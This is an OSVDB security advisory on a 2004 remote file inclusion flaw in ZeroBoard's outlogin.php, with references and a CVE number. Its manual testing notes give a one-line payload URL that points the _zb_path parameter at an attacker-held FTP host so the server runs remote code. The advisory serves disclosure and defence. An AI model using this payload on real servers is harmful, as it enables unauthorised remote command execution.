ZeroBoard outlogin.php Arbitrary Command Execution

2004-12-24T10:16:13
ID OSVDB:12580
Type osvdb
Reporter Jeremy Bae(swbae@stgsecurity.com)
Modified 2004-12-24T10:16:13

Description

Vulnerability Description

Zeroboard contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to outlogin.php not properly sanitizing user input supplied to the _zb_path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Zeroboard contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to outlogin.php not properly sanitizing user input supplied to the _zb_path variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[victim]/outlogin.php?_zb_path=ftp://[attacker]/pub/

References:

Vendor URL: http://zb.cmsn.net/ Security Tracker: 1012677 Secunia Advisory ID:13649 Related OSVDB ID: 12581 Related OSVDB ID: 12582 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2004-12/0410.html Keyword: Remote File Inclusion CVE-2004-1419